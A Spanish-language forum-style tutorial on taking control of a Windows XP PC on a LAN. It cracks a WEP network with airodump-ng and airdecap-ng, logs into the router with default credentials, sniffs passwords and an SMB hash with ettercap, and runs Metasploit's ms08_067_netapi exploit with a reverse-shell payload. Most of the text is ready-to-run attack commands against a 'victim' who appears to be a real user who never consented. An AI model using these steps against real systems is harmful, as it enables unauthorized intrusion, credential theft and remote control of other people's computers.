Tuto: Entrando a un PC en LAN

Tutorial: Explotando vulnerabilidades en LAN con Metasploit

Inicio: Este tutorial ha sido hecho con el fin de poner en evidencia el descuido de los user al negarse a actualizar su Windows, si bien por ignorancia, o por que su windows no es original, ignorando que tras cada inocente numero se oculta un peligro mucho mas grande, el poder controlar su equipo remotamente, aprovechando una vulnerabilidad que pudo haber sido parcheada desde Windows Update o desde la web del fabricante del Software, tal es el caso de Adobe 8.1.1 que tiene mas vulnerabilidades que deberia tener un simple lector de pdf's.

Veamos el Equipo a utilizar:

Ubuntu Linux 9.04 (atacante) Atheros AR5007EG

Windows XP SP3 (victima) Realtek PCI Ethernet

Metasploit 3.5 Framework (Lo haremos a consola, me gusta mas)

CABE ACLARAR QUE NO BORRE LAS MAC PORQUE ES EQUIPO VIEJO, QUE USE DE PRUEBA, por eso no me moleste en borrarlas, ya que el router que use, solo lo conecte para eso,de igual manera el xp, solo lo instale para esto, asimismo las wifi y ethernet, son equipo sin uso, y sin importancia

paso 1: Planeando el Golpe:

para planear el golpe, necesitamos hacernos de herramientas utiles, confiables y soporte de hard bueno y eficiente, para que no nos deje tirados a medio camino, veamos nuestra lista de herramientas:

Metasploit:

ettercap 0.7.3 un viejo favorito de todos, la GUI es mas util para propositos de este manual

Acer Aspire One

1gb de ram
Intel Atom a 1.6 Ghz
Y la roba carteras Atheros AR5007EG

paso 2: Estudiando a la victima:

La victima es un user tipico, sin mucho que hacer en un sistema XP clasico, sin actualizar, por miedo a que la copia de Windows no es original, (claro que lo es, ya que venia con el sistema) pero igual, insisto en que actualize y el replica, diciendo que no es necesario... bueno...

Tiene algunos metroflogs, navega por Wi-Fi, messenger y tiene a cargo de la seguridad el peor vigilante, ESET Smart Security v4 con fix y crack y demas tonterias.. menudo usuario.. ademas de no darse cuenta de que tiene algunas carpetas compartidas.. lo cual puede ser interesante... pero a la vez algo totalmente inutil, ya que no voy por sus archivos, sino a hacerme con el control total del sistema, no tengo ningun interes en joderle sus trabajos, ya que de seguro le ha costado esfuerzo hacerlo...

PAso 3: Infiltracion

Tiene una conexion de 1mb, ISP Megacable, con un clasico modem motorola poco eficiente, pero es suficiente para navegar en internet, ya que usa cifrado WEP, entremos a su wifi, GUARDANDO LOS PAQUETES en .cap, usando el comando:

Código:

sudo airodump-ng --write hack --channel X <interfaz>

luego procedemos a desencriptarlo

(son pocos porque no quiero pasar buen rato capturando tonterias)

Código:

sudo airdecap-ng -w wepkey hack-01.cap

ya despues de haber sacado la pass del WIFI procedemos a explorar:

Paso 4: Explorando tierras desconocidas:

Por Seguridad, recomiendo que se cambien la MAC del Dispositivo, con macchanger-gtk o a mano con ifconfig/iwconfig, despues de que tomamos la seguridad necesaria... exploremos un poco en el router/gateway/puerta de enlace, si es que conseguimos acceso a el...

rango de IP: 192.168.0.10-26
Gateway: 192.168.0.1
user/pass por defecto
WIFI users 2/2 WIFI/Ethernet
Objetivo: 192.168.0.10
SO: WinXP SP3
Hard P4 3.0 Ghz, 1gb RAM Dell Presicion 9150

importantisimo el decir que la pass y el user por defecto, puedes pillarlos en internet... bastante sencillo, tambien cabe aclarar que no es obligatoriamente necesario ownear al gateway... nosotros vamos a por el objetivo, no por sus archivos o su conexion, sino por su PC

luego con ettercap-ng vemos que ha pasado por su modem en el instante que le sniffabamos, (esto es necesario cuando no tenemos acceso al router, mas que nada para ver IPs de lan, en caso de DHCP deshabilitado, o para ver otros dispositivos de la LAN, impresoras, scanners, camaras de vigilancia, etc)

abrimos el hack-01-dec.cap, que es la captura ya descifrada y le damos a Start Sniffing, el programa hablara por si solo, si es que tiene algo que decir

WTF???

le hemos pillado las pass de los 3 metroflogs y un hash de un admin de smb, un servicio para compartir recursos en sistemas windows.. vaya que cosas pasan por los modems... es casi imposible creerlo, no me agrada lo que he sacado, me confunde el que haya un dominio, y el admin intentando loguearse, pero en fin, quizas...

1.-No es el usuario que pensamos, quiza es una trampa bien elaborada
2.-Es una mini red privada con muchos equipos entrando y saliendo
(pero no es posible, ya que la DHCP table, no indica mas que 4 equipos, tal vez la DHCP table, no guarda logs, solo muestra equipos en tiempo real)

¬¬ hmmm.... da igual, entraremos a fuerza.. de eso es el hacking

resumiendo esta area, tienes 2 opciones de exploracion:

1.- Entras a la WIFI como puedas,
2.-Puedes entrar al router y ver los host o puedes scanear los host por medio de ettercap
3.-si tu objetivo se conecta por WIFI, tienes 2 opciones, MITM con ettercap o capturar con airodump-ng y luego desencriptarle con airdecap y analizarle con ettercap
4.-si tu objetivo es por Ethernet, solo te queda la opcion de MITM con ettercap..
5.-en ambos casos (wifi/ethernet) el MITM se realiza de la misma forma, e independientemente del SO

paso 5:Limpiando y cerrojando Metasploit

A grandes rasgos podria decir que Metasploit es un set de exploits ya compilados y ya listos para la accion, preparados para ejecutarse y poder quebrantar la debil seguridad de un sistema Windows

instalamos metasploit desde su archivo .run bajado desde su web.

y luego en la terminal ejecutamos

Código:

sudo msfconsole

esperamos a que carguen los exploits y veremos la interfaz de metasploit tan interesante como su poder oculto..

hagamos un recuento, Win XP, no actualizaciones + SMB + NOD32fix + user tipico = control total del PC

podemos usar varios tipos de exploits, SMB me agrada y tiene mucho para ver:

es cuestion de poner en MSF

Código:

show exploits

y saldra algo com esto:

Código:

windows/smb/ms06_066_nwapi                                     good       Microsoft Services MS06-066 nwapi32.dll
   windows/smb/ms03_049_netapi                                    good       Microsoft Workstation Service NetAddAlternateComputerName Overflow
   windows/smb/smb2_negotiate_func_index                          good       Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
   windows/smb/ms04_031_netdde                                    good       Microsoft NetDDE Service Overflow
   windows/smb/msdns_zonename                                     great      Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)
   windows/smb/psexec                                             excellent  Microsoft Windows Authenticated User Code Execution
   windows/smb/ms04_011_lsass                                     great      Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow
   windows/smb/ms08_067_netapi                                    great      Microsoft Server Service Relative Path Stack Corruption
   windows/smb/netidentity_xtierrpcpipe                           great      Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow.
   windows/smb/ms06_025_rras                                      average    Microsoft RRAS Service Overflow
   windows/smb/ms05_039_pnp                                       good       Microsoft Plug and Play Service Overflow
   windows/smb/ms04_007_killbill                                  low        Microsoft ASN.1 Library Bitstring Heap Overflow
   windows/smb/ms06_066_nwwks                                     good       Microsoft Services MS06-066 nwwks.dll
   windows/smb/ms06_025_rasmans_reg                               good       Microsoft RRAS Service RASMAN Registry Overflow
   windows/smb/ms06_040_netapi                                    great      Microsoft Server Service NetpwPathCanonicalize Overflow
   windows/smb/smb_relay                                          excellent  Microsoft Windows SMB Relay Code Execution

hmmm cual elegire..?? elegire.. este!

windows/smb/ms08_067_netapi

refiere a una vulnerabilidad en SMB que permite ejecutar codigo remoto, muy interesante:

empecemos:

para seleccionar el exploit, ponemos en consola:

Código:

use windows/smb/ms08_067_netapi

y saldra asi:

despues, lo configuramos, poniendo:

Código:

show options

asi:

RHOST: Ip del objetivo en LAN
RPORT: puerto del servicio afectado
SMBPIPE: nombre para usar del SMB pipe

si queremos cambiar/poner alguno de estos parametros, ponemos:

Código:

set RHOST 192.168.0.10

Código:

set RPORT 445

o lo que necesitemos, no siempre son estos valores ni esta la config...

luego tendremos que seleccionar el codigo remoto que ejecutara despues de triggerear la vulnerabilidad, llamada payload

Código:

show payloads

y estas son las mas importantes,

windows/shell_reverse_tcp normal Windows Command Shell, Reverse TCP Inline
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
windows/shell/bind_tcp normal Windows Command Shell, Bind TCP Stager

2 bind para conectarse directamente y 2 reverses para que la victima se conecte a ti..

despues de selecciona la payload hay que seleccionar sus opciones, yo seleccione la primera de la lista

Código:

show options

para luego poner las opciones de la payload con estos comandos, elegi la payload de reverse connection porque se me hace mas facil, la reverse connection

Código:

set LHOST <tu ip de lan>

Código:

set LPORT 445

una vez listos todos los comandos y colocadas todas las ip, procedemos al ataque, ejecutando en metasploit el comando "exploit"

2da parte:

Tierras desconocidas... en proceso

Errores y demas, aqui por favor

Un Saludo